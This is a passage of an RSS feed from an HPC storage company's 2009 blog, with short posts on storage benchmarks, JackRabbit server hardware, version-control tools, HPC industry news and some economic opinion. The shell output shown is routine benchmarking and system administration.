      <title>Notes:  7 years in 2 days, and some new product stuff</title>
      <link>https://blog.scalability.org/2009/07/notes-7-years-in-2-days-and-some-new-product-stuff/</link>
      <pubDate>Thu, 30 Jul 2009 13:31:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/notes-7-years-in-2-days-and-some-new-product-stuff/</guid>
      <description>Our 7-year business anniversary (from when we started) is in 2 days. We launched 1-August-2002, at the height of the internet bubble collapse. I took a golden handshake from my employer at the time and formed Scalable. Took the risk I had always been afraid of. 7 years ago. Amazing. Growing and profitable six out of the seven years since then. Yes, we may have a 7th anniversary sale. Contact us if you want details, or if you want to take advantage of it early.</description>
    </item>
    
    <item>
      <title>Git book</title>
      <link>https://blog.scalability.org/2009/07/git-book/</link>
      <pubDate>Wed, 29 Jul 2009 02:35:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/git-book/</guid>
      <description>Here.</description>
    </item>
    
    <item>
      <title>There are many things to like in modern Linux.  NetworkManager is NOT one of them.</title>
      <link>https://blog.scalability.org/2009/07/there-are-many-things-to-like-in-modern-linux-networkmanager-is-not-one-of-them/</link>
      <pubDate>Mon, 27 Jul 2009 18:20:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/there-are-many-things-to-like-in-modern-linux-networkmanager-is-not-one-of-them/</guid>
      <description>I have never had as many problems directly caused by one application, across so many machines, across so many distributions, as NetworkManager. For those who don&amp;rsquo;t know, NetworkManager is your friendly helper application (mistakenly) adopted by distros to handle setting up networks. This would be well and good if it, I dunno, actually worked? I won&amp;rsquo;t recount my long painful history with it. Suffice it to say, everywhere I see it &amp;hellip; everywhere &amp;hellip; I immediately replace it with wicd.</description>
    </item>
    
    <item>
      <title>So close ... so close ... and then ...</title>
      <link>https://blog.scalability.org/2009/07/so-close-so-close-and-then/</link>
      <pubDate>Sun, 26 Jul 2009 14:31:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/so-close-so-close-and-then/</guid>
      <description>In this past week&amp;rsquo;s HPCwire podcast, Chris Willard and Michael Feldman discuss many things: the business side of HPC, the future of companies, etc. I agreed with everything they said (having said it here in these pages in the past). That is, until the last minute. That&amp;rsquo;s where what they said doesn&amp;rsquo;t quite mesh with what we observe and are experiencing. Specifically, they suggested that in these tough times, end users are being more conservative, sticking with the large vendors, and eschewing the smaller vendors.</description>
    </item>
    
    <item>
      <title>What is the future of storage?</title>
      <link>https://blog.scalability.org/2009/07/what-is-the-future-of-storage/</link>
      <pubDate>Sat, 25 Jul 2009 18:48:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/what-is-the-future-of-storage/</guid>
      <description>I am seeing lots of deep soul searching in pundit circles, as well as head scratching on the part of customers, as various vendors writhe and contort in their death throes. Pundits regularly trash that which they neither grasp, nor prefer. Customers wonder what the right path going forward is. Vendors struggle to figure out what the market really wants, and to be able to offer that (all the while the marketing teams are spinning hard and fast).</description>
    </item>
    
    <item>
      <title>&#34;But we can&#39;t use you because you are not &#39;X&#39;&#34;</title>
      <link>https://blog.scalability.org/2009/07/but-we-cant-use-you-because-you-are-not-x/</link>
      <pubDate>Thu, 23 Jul 2009 02:03:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/but-we-cant-use-you-because-you-are-not-x/</guid>
      <description>Been running into a bit of this recently. It&amp;rsquo;s usually preceded or followed by some sort of performance requirement that &amp;lsquo;X&amp;rsquo; just can&amp;rsquo;t hit, or they would need so much of &amp;lsquo;X&amp;rsquo; that it blows their budget up. I find it interesting that the IT folks, the ones really worried about their futures due to budget cuts placing pressure on them to do more while spending less, really get our message, and grok what we do, and how we can help them achieve their mission goals while reducing their costs.</description>
    </item>
    
    <item>
      <title>Itanic sinks at SGI</title>
      <link>https://blog.scalability.org/2009/07/itanic-sinks-at-sgi/</link>
      <pubDate>Thu, 23 Jul 2009 01:47:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/itanic-sinks-at-sgi/</guid>
      <description>This was a long time coming. Neither the previous management, prior to their sinking in April 2009, nor the management teams before that &amp;hellip; going back at least 10 years &amp;hellip; would ever have done this. It&amp;rsquo;s a shame. It should have happened long, long ago.
Basically Itanium is now legacy at SGI. I remember asking at some engineering/sales meeting what the plan B was. I remember the management blinking rapidly, but not giving an answer.</description>
    </item>
    
    <item>
      <title>JR5: Marathon run</title>
      <link>https://blog.scalability.org/2009/07/jr5-marathon-run/</link>
      <pubDate>Wed, 22 Jul 2009 20:29:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/jr5-marathon-run/</guid>
      <description>For those benchmark pr0n viewers &amp;hellip; here is Scalable Informatics Inc. JackRabbit JR5 unit with 48 drives. Simple benchmark. How long does it take you to write 1TB. How about 524 seconds?
[root@jr5 ~]# !498 mpirun -np 8 ./io-bm.exe -n 1024 -f /data/file -w -d -s -v -------------------------------------------------------------------------- [[8861,1],3]: A high-performance Open MPI point-to-point messaging module was unable to find any relevant network interfaces: Module: OpenFabrics (openib) Host: jr5.scalableinformatics.com Another transport will be used instead, although this may result in lower performance.</description>
    </item>
    
    <item>
      <title>A silly bug in io-bm</title>
      <link>https://blog.scalability.org/2009/07/a-silly-bug-in-io-bm/</link>
      <pubDate>Wed, 22 Jul 2009 04:44:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/a-silly-bug-in-io-bm/</guid>
      <description>It wasn&amp;rsquo;t enough to impact results, but it was enough to cause questioning my results (and sanity). Part of the IO operation is having N processes write to 1 file. To make this happen correctly, each process has to compute their offset into the file, and start operations from there. There is a seek involved. Now if I am smart, it won&amp;rsquo;t be lseek(file_descriptor,0,SEEK_SET); Nope &amp;hellip; that would be wrong (the zero).</description>
    </item>
    
    <item>
      <title>Getting Inc.ed</title>
      <link>https://blog.scalability.org/2009/07/getting-inc-ed/</link>
      <pubDate>Tue, 21 Jul 2009 20:53:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/getting-inc-ed/</guid>
      <description>Somewhat of a play on getting inked, the day job is now an Inc. rather than an LLC. The reasons for the change are many, ranging from taxes, to important things like raising capital. Yeah, I know, we are at a 15 year low for VC investments. But this is a capital intensive business, and we are growing, and have a need. So, this is one option for pursuing the capital we need.</description>
    </item>
    
    <item>
      <title>rethinking git vs hg</title>
      <link>https://blog.scalability.org/2009/07/rethinking-git-vs-hg/</link>
      <pubDate>Mon, 20 Jul 2009 20:43:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/rethinking-git-vs-hg/</guid>
      <description>I thought git was just getting better than mercurial. I found that basic git operations are easy, but others appear to be harder than I like (setting up remote repositories). Just tried the same thing with hg that I tried (and failed to do) with git. Worked like a charm.
landman@pgda-100:~/target$ hg push ssh://mmmmq@mmmmq/hg/target pushing to ssh://mmmmq@mmmmq/hg/target searching for changes remote: adding changesets remote: adding manifests remote: adding file changes remote: added 1 changesets with 5 changes to 5 files  hg can use ssh, which looks like it makes lots of stuff simple.</description>
    </item>
    
    <item>
      <title>Talking about high performance ...</title>
      <link>https://blog.scalability.org/2009/07/talking-about-high-performance/</link>
      <pubDate>Sun, 19 Jul 2009 19:45:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/talking-about-high-performance/</guid>
      <description>&amp;hellip; the Blue Angels are doing hard banks right above my house right now, as part of the Willow Run Thunder over Michigan airshow. We went to it yesterday, but live close enough that we see them on their far turns. Two minutes ago they were literally right over my house, doing a hard bank. Have pictures and videos. Most impressive! These guys and gals have some serious high performance hardware &amp;hellip; I have to admit, some of my favorite parts were when they did their high speed passes, and then opened up with afterburners on the climb out.</description>
    </item>
    
    <item>
      <title>... and HP snarfs up Ibrix ...</title>
      <link>https://blog.scalability.org/2009/07/and-hp-snarfs-up-ibrix/</link>
      <pubDate>Fri, 17 Jul 2009 20:07:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/and-hp-snarfs-up-ibrix/</guid>
      <description>See here. What&amp;rsquo;s Dell going to do now? Ibrix is Dell&amp;rsquo;s favorite parallel file system for clusters.</description>
    </item>
    
    <item>
      <title>More JackRabbit 96TB OpenSolaris system</title>
      <link>https://blog.scalability.org/2009/07/more-jackrabbit-96tb-opensolaris-system/</link>
      <pubDate>Fri, 17 Jul 2009 19:01:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/more-jackrabbit-96tb-opensolaris-system/</guid>
      <description>even more JackRabbit OpenSolaris 2009.06 goodness.
landman@pgda-100:~$ ssh scalable@192.168.1.74 Password: Last login: Fri Jul 17 13:32:57 2009 Sun Microsystems Inc. SunOS 5.11 snv_111b November 2008 scalable@jr5-96TB:~$ su Password: scalable@jr5-96TB:~# zpool create tank c7t1d0 c10t2d0 c11t3d0 scalable@jr5-96TB:~# zpool status tank pool: tank state: ONLINE scrub: none requested config: NAME STATE READ WRITE CKSUM tank ONLINE 0 0 0 c7t1d0 ONLINE 0 0 0 c10t2d0 ONLINE 0 0 0 c11t3d0 ONLINE 0 0 0 errors: No known data errors scalable@jr5-96TB:~# df -h /tank Filesystem size used avail capacity Mounted on tank 70T 19K 70T 1% /tank  70TB of ZFS on JR5-96Tn.</description>
    </item>
    
    <item>
      <title>JR5 96TB running OpenSolaris 2009.06</title>
      <link>https://blog.scalability.org/2009/07/jr5-96tb-running-opensolaris-2009-06/</link>
      <pubDate>Fri, 17 Jul 2009 18:13:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/jr5-96tb-running-opensolaris-2009-06/</guid>
      <description>Scalable Informatics JackRabbit OpenSolaris pr0n for those disposed to such things. Remember, this is a 2.5+ GB/s machine (e.g. measured bandwidth on RAID6, not &amp;ldquo;theoretical bandwidth&amp;rdquo; with a RAID0). From what I can see, this is the largest (capacity) and fastest (raw and usable) performance OpenSolaris machine on the market. 8 Nehalem cores, 72 GB RAM, 96TB raw, 72TB usable in 5U, for under $60k USD, with 10GbE and/or Infiniband. There does appear to be some strangeness upon setup &amp;hellip; Solaris was not willing to run on a &amp;gt; 2TB disk.</description>
    </item>
    
    <item>
      <title>When debugging ... make sure you have evidence before you point fingers</title>
      <link>https://blog.scalability.org/2009/07/when-debugging-make-sure-you-have-evidence-before-you-point-fingers/</link>
      <pubDate>Thu, 16 Jul 2009 22:01:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/when-debugging-make-sure-you-have-evidence-before-you-point-fingers/</guid>
      <description>A 128 core cluster, and a user experiencing &amp;lsquo;strange&amp;rsquo; delays in their application. It is an MPI code we found problems in previously. I have to admit that at first I was amused when someone blamed the MPI stack, claiming it was broken, and did so by demonstrating that they didn&amp;rsquo;t know how to use an MPI stack. Their test case, literally copied from an online course (possibly even our course materials), was the MPI-HelloWorld Fortran example.</description>
    </item>
    
    <item>
      <title>OT:  Bad ideas ... part II</title>
      <link>https://blog.scalability.org/2009/07/ot-bad-ideas-part-ii/</link>
      <pubDate>Thu, 16 Jul 2009 15:09:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/ot-bad-ideas-part-ii/</guid>
      <description>Again, not a partisan issue &amp;hellip; this approach to fund something by penalizing one group is a very bad idea. Cigarette and alcohol taxes are in place and as high as they are, specifically to change behavior. Making something far more expensive does materially impact the way people behave. It causes them to perform more cost-benefit analyses. And they change their behaviors. I am quite certain that those who designed this legislation did not anticipate that by significantly increasing taxes on businesses, that this would impact &amp;hellip; I dunno &amp;hellip; employment?</description>
    </item>
    
    <item>
      <title>Irresistable force?  meet Immovable object ...</title>
      <link>https://blog.scalability.org/2009/07/irresistable-force-meet-immovable-object/</link>
      <pubDate>Thu, 16 Jul 2009 01:36:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/irresistable-force-meet-immovable-object/</guid>
      <description>There is a strong push (well at least the articles tell us so, and you know, its not like they are ever wrong &amp;hellip; nosiree) to move computing into a cloud. This is sometimes a good idea, there are specific profiles which fit the cloud paradigm. Quite a few profiles actually. But there are some speedbumps. Literally. Bandwidth has been, and will be, an issue for the foreseeable future. Clouds have limited bandwidth in and out.</description>
    </item>
    
    <item>
      <title>Sometimes being right isn&#39;t a happy thing</title>
      <link>https://blog.scalability.org/2009/07/sometimes-being-right-isnt-a-happy-thing/</link>
      <pubDate>Thu, 16 Jul 2009 00:00:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/sometimes-being-right-isnt-a-happy-thing/</guid>
      <description>In this post, I wrote
and today, we get confirmation that we hit 15.2% in June. More layoffs have happened since then. GM cut another 1000, Chrysler and Ford have been cutting hard. So when can we start using the correct name for this economic condition? What I can say is that I am seeing signs of life &amp;hellip; significant signs of life in the HPC auto community. No, not necessarily the big 3&amp;rsquo;s large machines.</description>
    </item>
    
    <item>
      <title>OT:  bad ideas</title>
      <link>https://blog.scalability.org/2009/07/ot-bad-ideas/</link>
      <pubDate>Wed, 15 Jul 2009 12:15:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/ot-bad-ideas/</guid>
      <description>Saw this, this morning. Then another one. No, this will not impact me/us right now. And as we are converting the LLC into a C-corp, it should have no real impact until we sell the company. But it will impact any small business owner with enough revenue to matter. Heck, if you look at tax returns, it appears that lots of small business owners are wealthy. They aren&amp;rsquo;t, but it would appear that way.</description>
    </item>
    
    <item>
      <title>Sun reports Q4 numbers</title>
      <link>https://blog.scalability.org/2009/07/sun-reports-q4-numbers/</link>
      <pubDate>Wed, 15 Jul 2009 01:08:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/sun-reports-q4-numbers/</guid>
      <description>At the Reg. Not good. In a nutshell? Revenues cratered.
Thursday, Sun shareholders vote on selling Sun to Oracle. I&amp;rsquo;d call it a foregone conclusion that this deal will be approved. If the regulators don&amp;rsquo;t approve it &amp;hellip; well &amp;hellip;
The Reg opines more.
Yeah. We have a reasonably good idea of what is and is not toast. It would not surprise me to see Oracle sell off the hardware business in bits and pieces.</description>
    </item>
    
    <item>
      <title>The business side of HPC</title>
      <link>https://blog.scalability.org/2009/07/the-business-side-of-hpc-2/</link>
      <pubDate>Tue, 14 Jul 2009 23:04:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/the-business-side-of-hpc-2/</guid>
      <description>John West at InsideHPC has, as usual, an interesting article on rumors of SGI abandoning a bid because of &amp;ldquo;margin games.&amp;rdquo;
The market is changing as business gets more challenging. The drive to lower and negative margins will drive vendors from the market. At some point those purchasing gear will have to decide if the cost they pay for driving the price and margins into the ground is worth the benefit they get for doing it.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2009-07-14</title>
      <link>https://blog.scalability.org/2009/07/twitter-updates-for-2009-07-14/</link>
      <pubDate>Tue, 14 Jul 2009 07:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/twitter-updates-for-2009-07-14/</guid>
      <description>* JR5 96TB #[hpc](http://search.twitter.com/search?q=%23hpc) #[storage](http://search.twitter.com/search?q=%23storage) unit ([http://bit.ly/2UhAFV](http://bit.ly/2UhAFV)  hits 2.5GB/s (http://scalability.org/?p=1706) sustained w/256GB file # * FYI: gigabyte per second #NFS on a single cost-effective box. See http://scalability.org/?p=1708 about this #hpc #storage unit #
Powered by Twitter Tools.</description>
    </item>
    
    <item>
      <title>Who says you can&#39;t do Gigabyte per second NFS?</title>
      <link>https://blog.scalability.org/2009/07/who-says-you-cant-do-gigabyte-per-second-nfs/</link>
      <pubDate>Mon, 13 Jul 2009 16:48:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/who-says-you-cant-do-gigabyte-per-second-nfs/</guid>
      <description>I keep hearing this. It&amp;rsquo;s not true, though. See below. NFS client: Scalable Informatics Delta-V (ΔV) 4 unit. NFS server: Scalable Informatics JackRabbit 4 unit. (You can buy these units today from Scalable Informatics and its partners.) 10GbE: single XFP fibre between two 10GbE NICs. This is NOT a clustered NFS result.
root@dv4:~# mount | grep data2 10.1.3.1:/data on /data2 type nfs (rw,intr,rsize=262144,wsize=262144,tcp,addr=10.1.3.1) root@dv4:~# mpirun -np 4 ./io-bm.exe -n 32 -f /data2/test/file -r -d -v N=32 gigabytes will be written in total each thread will output 8.</description>
    </item>
    
    <item>
      <title>Its all in how you do the IO ...</title>
      <link>https://blog.scalability.org/2009/07/its-all-in-how-you-do-the-io/</link>
      <pubDate>Mon, 13 Jul 2009 03:07:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/its-all-in-how-you-do-the-io/</guid>
      <description>JackRabbit 5U (JR5) 96TB unit, with 8 threads writing to the same file (each one writing to a different section of the file to reduce contention). Write performance below.
[root@jr5 ~]# mpirun -np 8 ./io-bm.exe -n 128 -f /data/file -w -s -d -v N=128 gigabytes will be written in total each thread will output 16.000 gigabytes page size ... 4096 bytes number of elements per buffer ... 2097152 number of buffers per file .</description>
    </item>
    
    <item>
      <title>Puzzle solved ... now good results</title>
      <link>https://blog.scalability.org/2009/07/puzzle-solved-now-good-results/</link>
      <pubDate>Mon, 13 Jul 2009 02:52:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/puzzle-solved-now-good-results/</guid>
      <description>Ok, io-bm.c is fixed. I had a typo in a define. That did a pretty good job of removing all the MPI goodness &amp;hellip; Fixed, and ran it. Looks like we see good performance, with none of the strange loss of IO that bonnie++ has. This is what we see with verbose mode on.
Writing: 4 threads
[root@jr5 ~]# mpirun -np 4 ./io-bm.exe -n 128 -f /data/file -w -d -v N=128 gigabytes will be written in total each thread will output 32.</description>
    </item>
    
    <item>
      <title>A mystery within a puzzle ...</title>
      <link>https://blog.scalability.org/2009/07/a-mystery-within-a-puzzle/</link>
      <pubDate>Sun, 12 Jul 2009 19:35:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/a-mystery-within-a-puzzle/</guid>
      <description>In some previous posts I had been discussing bonnie++ (not bonnie, sorry Tim) and its seeming inability to keep the underlying file system busy. So I hauled out something I wrote a while ago, for precisely these purposes (I&amp;rsquo;ll get it onto our external Mercurial repository soon). Push the box(es) as hard as you can, in IO. I built this using OpenMPI on the JackRabbit (JR5 96TB unit) and ran it.</description>
    </item>
    
    <item>
      <title>More local economic bits</title>
      <link>https://blog.scalability.org/2009/07/more-local-economic-bits/</link>
      <pubDate>Sun, 12 Jul 2009 16:14:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/more-local-economic-bits/</guid>
      <description>My rep in congress (Scalable&amp;rsquo;s too) is pointing out some unhappy guestimates of how our local economy will fare:
Well, while I agree with him that it&amp;rsquo;s getting worse here (we blew through 14.1% in May &amp;hellip; likely at 15% or worse now in July), had the autos fallen, unemployment would have been worse. This said, it is very important to let the economy do what economies do best, and stop trying to pretend to control it.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2009-07-12</title>
      <link>https://blog.scalability.org/2009/07/twitter-updates-for-2009-07-12/</link>
      <pubDate>Sun, 12 Jul 2009 07:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/twitter-updates-for-2009-07-12/</guid>
      <description>* from the testing lab, some very fast #[hpc](http://search.twitter.com/search?q=%23hpc) #[storage](http://search.twitter.com/search?q=%23storage) systems: 24TB JR4 writes at 2 GB/s, 96 TB JR5 reads at 2.2 GB/s. [#](http://twitter.com/sijoe/statuses/2592997412)  Powered by Twitter Tools.</description>
    </item>
    
    <item>
      <title>JackRabbit 5U 96TB time trials</title>
      <link>https://blog.scalability.org/2009/07/jackrabbit-5u-96tb-time-trials/</link>
      <pubDate>Sun, 12 Jul 2009 02:34:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/jackrabbit-5u-96tb-time-trials/</guid>
      <description>The RAID has finished building on the JackRabbit 5U (JR5) (these units are now available from us or our reseller partners in the US, EU, and India). As a refresher, this is the 96TB unit, with 3 RAID cards, and 48x 2TB enterprise SATA disks. The RAIDs are hardware RAID6 (16 drives, 1 hot spare and 15 RAID drives, yielding 13 data drives). 3 groups of 13x 2TB drives is 78TB.</description>
    </item>
    
    <item>
      <title>More bonnie</title>
      <link>https://blog.scalability.org/2009/07/more-bonnie/</link>
      <pubDate>Sat, 11 Jul 2009 17:47:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/more-bonnie/</guid>
      <description>Following Chris Samuel&amp;rsquo;s suggestion, I pulled down version 1.96 of bonnie and built it. The machine I am using now is a Scientific Linux based system, with Scalable Informatics 2.6.28.7 kernel. Scientific Linux is yet another RHEL rebuild. This is a customer requested distribution for this machine. SL suffers from the RHEL kernel, which is IMO inappropriate for use as a high performance storage system kernel. Workload patterns our customers wish to test regularly crash the RHEL distro kernels.</description>
    </item>
    
    <item>
      <title>Bonnie isn&#39;t that good at characterizing system IO rates</title>
      <link>https://blog.scalability.org/2009/07/bonnie-isnt-that-good-at-characterizing-system-io-rates/</link>
      <pubDate>Sat, 11 Jul 2009 05:05:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/bonnie-isnt-that-good-at-characterizing-system-io-rates/</guid>
      <description>I started thinking about bonnie&amp;rsquo;s IO after looking at some of the numbers, and how the system behaved while running the tool. Fio is a much better and more controllable tool. You can understand what it is doing. And you can use it to model bonnie, and therefore understand what bonnie is and isn&amp;rsquo;t doing.
In short, while running bonnie++, I found the core machine stats, as seen in vmstat, dstat, iostat, and other tools, to be basically idle during the writes.</description>
    </item>
    
    <item>
      <title>DV4 mounting JR4 over NFS and doing a simple stream copy</title>
      <link>https://blog.scalability.org/2009/07/dv4-mounting-jr4-over-nfs-and-doing-a-simple-stream-copy/</link>
      <pubDate>Fri, 10 Jul 2009 21:32:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/dv4-mounting-jr4-over-nfs-and-doing-a-simple-stream-copy/</guid>
      <description>This is what our tagline of Simply Faster means. The performance is there, and is simple to use. See below.
On DV4
root@dv4:~# mount -o intr,rsize=262144,wsize=262144,tcp 10.1.3.1:/data /data2
root@dv4:~# ls -alF /data2
total 67108868
drwxr-xr-x 2 root root 21 2009-07-10 11:01 ./
drwxr-xr-x 23 root root 4096 2009-07-10 17:18 ../
-rw-r--r-- 1 root root 68719476736 2009-07-10 13:07 big.file
root@dv4:~# dd if=/data2/big.file of=/dev/null bs=16M
4096+0 records in
4096+0 records out
68719476736 bytes (69 GB) copied, 110.</description>
    </item>
    
    <item>
      <title>Time trials:  A new record</title>
      <link>https://blog.scalability.org/2009/07/time-trials-a-new-record/</link>
      <pubDate>Fri, 10 Jul 2009 19:20:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/time-trials-a-new-record/</guid>
      <description>The JR5 is still building its RAID. 96TB of sweetness in that unit. But it&amp;rsquo;s the JR4 that is tearing up the records. Did a little tuning, just to fix a problem with the OS drives. I&amp;rsquo;ll have a long diatribe on this at some point, but not now. JR4, sitting on the bench in the lab. Pair of Chelsio 10GbE cards, 8 cores of Nehalem goodness, 48 GB ram. Let&amp;rsquo;s take her for a spin, and light up the afterburners.</description>
    </item>
    
    <item>
      <title>pre-tuning baseline streaming data run for new JR4s</title>
      <link>https://blog.scalability.org/2009/07/pre-tuning-baseline-streaming-data-run-for-new-jr4s/</link>
      <pubDate>Wed, 08 Jul 2009 13:01:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/pre-tuning-baseline-streaming-data-run-for-new-jr4s/</guid>
      <description>In the late 80s, right before I finished undergraduate work at Stony Brook, I bought an orange colored 1973 Chevy Nova. It was, well, butt ugly. But it had a 350 small block engine in it which, as I had been told by people (supposedly) more knowledgeable than I (in these areas), was shared by the Corvette models of that year. I don&amp;rsquo;t know if that was true. I do know that this was an engine I could tune.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2009-07-08</title>
      <link>https://blog.scalability.org/2009/07/twitter-updates-for-2009-07-08/</link>
      <pubDate>Wed, 08 Jul 2009 07:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/twitter-updates-for-2009-07-08/</guid>
      <description>* Stabilizing JR4 with SAS drives. Some motherboard - raid issues to be dealt with. Performance is good. [#](http://twitter.com/sijoe/statuses/2517905215) * The 2TB drives have arrived ... the 2TB drives have arrived ... [#](http://twitter.com/sijoe/statuses/2517918749)  Powered by Twitter Tools.</description>
    </item>
    
    <item>
      <title>in the testing lab</title>
      <link>https://blog.scalability.org/2009/07/in-the-testing-lab/</link>
      <pubDate>Tue, 07 Jul 2009 20:56:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/in-the-testing-lab/</guid>
      <description>Thought a few people might like to see this. A new JackRabbit (JR4) being built. We are testing one of its RAIDs. Dealing with some MB issues, but otherwise, back onto stable ground. This is a single RAID card with 8 drives, 7 in a RAID6 + 1 hot spare. Large sequential streaming read and write. 4x larger than RAM in the machine. Caching is not relevant to this. No tuning.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2009-07-07</title>
      <link>https://blog.scalability.org/2009/07/twitter-updates-for-2009-07-07/</link>
      <pubDate>Tue, 07 Jul 2009 07:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/twitter-updates-for-2009-07-07/</guid>
      <description>* @[garystiehr](http://twitter.com/garystiehr) Gb/s or GB/s? An order of magnitude can make a large difference ... [in reply to garystiehr](http://twitter.com/garystiehr/statuses/2499758846) [#](http://twitter.com/sijoe/statuses/2504247739) * new 48TB DV4 is up and rock solid. Working on stabilizing the JR4 that goes with it. Some 10GbE cards are hard to find these days ... [#](http://twitter.com/sijoe/statuses/2504274758)  Powered by Twitter Tools.</description>
    </item>
    
    <item>
      <title>Two for two ...</title>
      <link>https://blog.scalability.org/2009/07/two-for-two/</link>
      <pubDate>Mon, 06 Jul 2009 15:28:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/two-for-two/</guid>
      <description>We use Fedex and UPS to ship in the day job. Lots of our stuff is pretty sturdy, but some things simply do not like being bumped hard. Like disks. Or like Pegasus boxen, with many expensive cards sitting in the PCI-e slots. Awaiting pictures from the customer, but it looks like two of the Cell based units we shipped out (w/o Tesla cards, that should be arriving soon), got beat up in transit.</description>
    </item>
    
    <item>
      <title>Amusing programming construct that I am using for sanity checking</title>
      <link>https://blog.scalability.org/2009/06/amusing-programming-construct-that-i-am-using-for-sanity-checking/</link>
      <pubDate>Wed, 01 Jul 2009 03:36:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/amusing-programming-construct-that-i-am-using-for-sanity-checking/</guid>
      <description>Start out from a known state &amp;hellip;
`my $dryrun = false; my $debug = false; my $sanity = false;` Heh &amp;hellip; maybe I should create a function with a probability distribution (a fuzzy function) named &amp;quot;is_in_doubt()&amp;quot; so I can write `my $sanity = &amp;amp;is_in_doubt();` (and yes, this is Perl &amp;hellip; I just can&amp;rsquo;t bring myself to go back to a language that thinks indentation is a good and necessary thing for program structure &amp;hellip; :( )</description>
    </item>
    
    <item>
      <title>Good conversation with NVidia</title>
      <link>https://blog.scalability.org/2009/06/good-conversation-with-nvidia/</link>
      <pubDate>Mon, 29 Jun 2009 17:55:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/good-conversation-with-nvidia/</guid>
      <description>They are getting backlog serviced as fast as they can. Looks like they are clearing it out pretty quickly. This is good. Customers had been asking us about the reason for the delay. We speculated numerous possibilities. Most (all?) of them (my speculations) were wrong. That is good as well. I am thinking now that the problem is macroeconomic, not microeconomic. That is, its the entire ecosystem, not one company. Everyone gets walloped in a recession.</description>
    </item>
    
    <item>
      <title>Cloud storage and HPC cloud PR is out</title>
      <link>https://blog.scalability.org/2009/06/cloud-storage-and-hpc-cloud-pr-is-out/</link>
      <pubDate>Mon, 29 Jun 2009 13:51:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/cloud-storage-and-hpc-cloud-pr-is-out/</guid>
      <description>Released this morning Automated High Performance Computing Solutions Provide Alternative to Shared Virtual Private Server Clouds FORT LAUDERDALE, Fla.&amp;ndash;(Business Wire)&amp;ndash; NewServers Inc., the leading provider of Hardware as a Service (HaaS) dedicated cloud servers, today announced a strategic partnership with high performance computing (HPC) provider Scalable Informatics that will provide cloud storage solutions capable of supporting HPC.
NewServers will integrate Scalable Informatics&#39; JackRabbit high-performance server storage solution into the company&amp;rsquo;s service.</description>
    </item>
    
    <item>
      <title>Lots of updates, all good</title>
      <link>https://blog.scalability.org/2009/06/lots-of-updates-all-good/</link>
      <pubDate>Sat, 27 Jun 2009 19:12:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/lots-of-updates-all-good/</guid>
      <description>All for the day job: First, our help system is now online. This allows us to provide an externally visible issue tracking and project management/tracking site for customers. Not just for our hardware. Scalable Informatics has been helping people support other peoples hardware for quite a while. Some of our biggest/best customers have not bought a single bit of hardware from us, but pay us to help them support, run, install, manage, &amp;hellip;.</description>
    </item>
    
    <item>
      <title>Freedom from bricking</title>
      <link>https://blog.scalability.org/2009/06/freedom-from-bricking/</link>
      <pubDate>Thu, 25 Jun 2009 13:12:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/freedom-from-bricking/</guid>
      <description>This is one of several memes customers are noting to us. They are worried, what happens if vendor X goes away, can I still get support/fixes/replacement parts for my gear? In the case of some of our competitors, the answer is a resounding and unqualified NO. In our case, our high performance JackRabbit systems, our value priced Delta-V, and our Pegasus deskside supercomputers, the answer is a resounding and unqualified YES.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2009-06-25</title>
      <link>https://blog.scalability.org/2009/06/twitter-updates-for-2009-06-25/</link>
      <pubDate>Thu, 25 Jun 2009 07:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/06/twitter-updates-for-2009-06-25/</guid>
